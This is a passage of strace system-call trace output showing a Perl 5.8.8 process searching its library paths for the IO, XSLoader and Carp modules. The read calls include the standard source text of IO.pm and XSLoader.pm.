10421 07:32:55.840118 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbfbed93c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840131 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbfbed84c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840144 stat64("/usr/lib/perl5/IO.pmc", 0xbfbed93c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840156 stat64("/usr/lib/perl5/IO.pm", 0xbfbed84c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840169 stat64("/usr/share/perl5/IO.pmc", 0xbfbed93c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840181 stat64("/usr/share/perl5/IO.pm", 0xbfbed84c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840194 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbfbed93c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840206 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0

10421 07:32:55.840227 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6

10421 07:32:55.840241 ioctl(6, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbed658) = -1 ENOTTY (Inappropriate ioctl for device)

10421 07:32:55.840252 _llseek(6, 0, [0], SEEK_CUR) = 0

10421 07:32:55.840275 read(6, "#\n\npackage IO;\n\nuse XSLoader ();\nuse Carp;\nuse strict;\nuse warnings;\n\nour $VERSION = \"1.22\";\nXSLoader::load \'IO\', $VERSION;\n\nsub import {\n    shift;\n\n    warnings::warnif(\'deprecated\', qq{Parameterless \"use IO\" deprecated})\n        if @_ == 0 ;\n    \n    my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);\n\n    eval join(\"\", map { \"require IO::\" . (/(\\w+)/)[0] . \";\\n\" } @l)\n\tor croak $@;\n}\n\n1;\n\n__END__\n\n", 4096) = 413

10421 07:32:55.840332 stat64("/etc/perl/XSLoader.pmc", 0xbfbed48c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840345 stat64("/etc/perl/XSLoader.pm", 0xbfbed39c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840359 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pmc", 0xbfbed48c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840371 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pm", 0xbfbed39c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840385 stat64("/usr/local/share/perl/5.8.8/XSLoader.pmc", 0xbfbed48c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840398 stat64("/usr/local/share/perl/5.8.8/XSLoader.pm", 0xbfbed39c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840415 stat64("/usr/lib/perl5/XSLoader.pmc", 0xbfbed48c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840427 stat64("/usr/lib/perl5/XSLoader.pm", 0xbfbed39c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840441 stat64("/usr/share/perl5/XSLoader.pmc", 0xbfbed48c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840453 stat64("/usr/share/perl5/XSLoader.pm", 0xbfbed39c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840466 stat64("/usr/lib/perl/5.8/XSLoader.pmc", 0xbfbed48c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840478 stat64("/usr/lib/perl/5.8/XSLoader.pm", {st_mode=S_IFREG|0644, st_size=3408, ...}) = 0

10421 07:32:55.841136 open("/usr/lib/perl/5.8/XSLoader.pm", O_RDONLY|O_LARGEFILE) = 8

10421 07:32:55.841165 ioctl(8, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbed1a8) = -1 ENOTTY (Inappropriate ioctl for device)

10421 07:32:55.841187 _llseek(8, 0, [0], SEEK_CUR) = 0

10421 07:32:55.841209 read(8, "# Generated from XSLoader.pm.PL (resolved %Config::Config value)\n\npackage XSLoader;\n\n$VERSION = \"0.06\";\n\n#use strict;\n\n# enable debug/trace messages from DynaLoader perl code\n# $dl_debug = $ENV{PERL_DL_DEBUG} || 0 unless defined $dl_debug;\n\n  my $dl_dlext = \'so\';\n\npackage DynaLoader;\n\n# No prizes for guessing why we don\'t say \'bootstrap DynaLoader;\' here.\n# NOTE: All dl_*.xs (including dl_none.xs) define a dl_error() XSUB\nboot_DynaLoader(\'DynaLoader\') if defined(&boot_DynaLoader) &&\n                                !defined(&dl_error);\npackage XSLoader;\n\nsub load {\n    package DynaLoader;\n\n    die q{XSLoader::load(\'Your::Module\', $Your::Module::VERSION)} unless @_;\n\n    my($module) = $_[0];\n\n    # work with static linking too\n    my $b = \"$module\\::bootstrap\";\n    goto &$b if defined &$b;\n\n    goto retry unless $module and defined &dl_load_file;\n\n    my @modparts = split(/::/,$module);\n    my $modfname = $modparts[-1];\n\n    my $modpname = join(\'/\',@modparts);\n    my $modlibname = (caller())[1];\n    my $c = @modparts;\n    $modlibname =~ s,[\\\\/][^\\\\/]+$,, while $c--;\t# Q&D basename\n    my $file = \"$modlibname/auto/$modpname/$modfname.$dl_dlext\";\n\n#   print STDERR \"XSLoader::load for $module ($file)\\n\" if $dl_debug;\n\n    my $bs = $file;\n    $bs =~ s/(\\.\\w+)?(;\\d*)?$/\\.bs/; # look for .bs \'beside\' the library\n\n    goto retry if not -f $file or -s $bs;\n\n    my $bootname = \"boot_$module\";\n    $bootname =~ s/\\W/_/g;\n    @DynaLoader::dl_require_symbols = ($bootname);\n\n    my $boot_symbol_ref;\n\n    if ($^O eq \'darwin\') {\n        if ($boot_symbol_ref = dl_find_symbol(0, $bootname)) {\n            goto boot; #extension library has already been loaded, e.g. darwin\n        }\n    }\n\n    # Many dynamic extension loading problems will appear to come from\n    # this section of code: XYZ failed at line 123 of DynaLoader.pm.\n    # Often these errors are actually occurring in the initialisation\n    # C code of the extension XS file. Perl reports the error as being\n    # in this perl code simply because this was the last perl code\n    # it executed.\n\n    my $libref = dl_load_file($file, 0) or do { \n        require Carp;\n        Carp::croak(\"Can\'t load \'$file\' for module $module: \" . dl_error());\n    };\n    push(@DynaLoader::dl_librefs,$libref);  # record loaded object\n\n    my @unresolved = dl_undef_symbols();\n    if (@unresolved) {\n        require Carp;\n        Carp::carp(\"Undefined symbols present after loading $file: @unresolved\\n\");\n    }\n\n    $boot_symbol_ref = dl_find_symbol($libref, $bootname) or do {\n        require Carp;\n        Carp::croak(\"Can\'t find \'$bootname\' symbol in $file\\n\");\n    };\n\n    push(@DynaLoader::dl_modules, $module); # record loaded module\n\n  boot:\n    my $xs = dl_install_xsub(\"${module}::bootstrap\", $boot_symbol_ref, $file);\n\n    # See comment block above\n    return &$xs(@_);\n\n  retry:\n    my $bootstrap_inherit = DynaLoader->can(\'bootstrap_inherit\') || \n                            XSLoader->can(\'bootstrap_inherit\');\n    goto &$bootstrap_inherit;\n}\n\n# Versions of DynaLoader prior to 5.6.0 don\'t have this function.\nsub bootstrap_inherit {\n    package DynaLoader;\n\n    my $module = $_[0];\n    local *DynaLoader::isa = *{\"$module\\::ISA\"};\n    local @DynaLoader::isa = (@DynaLoader::isa, \'DynaLoader\');\n    # Cannot goto due to delocalization.  Will report errors on a wrong line?\n    require DynaLoader;\n    DynaLoader::bootstrap(@_);\n}\n\n1;\n\n__END__\n\n", 4096) = 3408

10421 07:32:55.841449 brk(0x8195000)    = 0x8195000

10421 07:32:55.841773 _llseek(8, 3407, [3407], SEEK_SET) = 0

10421 07:32:55.841791 _llseek(8, 0, [3407], SEEK_CUR) = 0

10421 07:32:55.841802 close(8)          = 0

10421 07:32:55.841847 stat64("/etc/perl/Carp.pmc", 0xbfbed48c) = -1 ENOENT (No such file or directory)

10421 07:32:55.841863 stat64("/etc/perl/Carp.pm", 0xbfbed39c) = -1 ENOENT (No such file or directory)

10421 07:32:55.841876 stat64("/usr/local/lib/perl/5.8.8/Carp.pmc", 0xbfbed48c) = -1 ENOENT (No such file or directory)

10421 07:32:55.841889 stat64("/usr/local/lib/perl/5.8.8/Carp.pm", 0xbfbed39c) = -1 ENOENT (No such file or directory)

10421 07:32:55.841903 stat64("/usr/local/share/perl/5.8.8/Carp.pmc", 0xbfbed48c) = -1 ENOENT (No such file or directory)

10421 07:32:55.841915 stat64("/usr/local/share/perl/5.8.8/Carp.pm", 0xbfbed39c) = -1 ENOENT (No such file or directory)

10421 07:32:55.841929 stat64("/usr/lib/perl5/Carp.pmc", 0xbfbed48c) = -1 ENOENT (No such file or directory)

10421 07:32:55.841941 stat64("/usr/lib/perl5/Carp.pm", 0xbfbed39c) = -1 ENOENT (No such file or directory)

